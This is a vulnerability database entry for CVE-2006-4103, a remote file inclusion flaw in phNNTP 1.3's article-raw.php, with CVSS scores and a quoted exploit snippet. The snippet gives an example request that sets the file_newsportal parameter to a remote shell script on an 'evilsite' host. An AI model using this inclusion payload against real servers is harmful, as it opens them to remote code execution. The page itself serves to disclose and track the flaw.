7.5
CVSSv2

CVE-2006-4103

Published: 14/08/2006 Updated: 17/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in article-raw.php in Jason Alexander phNNTP 1.3 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the file_newsportal parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

jason alexander phnntp

Exploits

phNNTP v13 Remote File Inclusion CreW: ToxiC Bug Found By Drago84 Source Code: freshmeatnet/redir/phnntp/16290/url_tgz/phNNTP-v13targz Problem Is: require("$file_newsportal"); Page Affect: article-rawphp Path: Declare file_newsportal ExP: server/Dir_phNNTP/article-rawphp?file_newsportal=wwwevalsitecom/shellphp? ...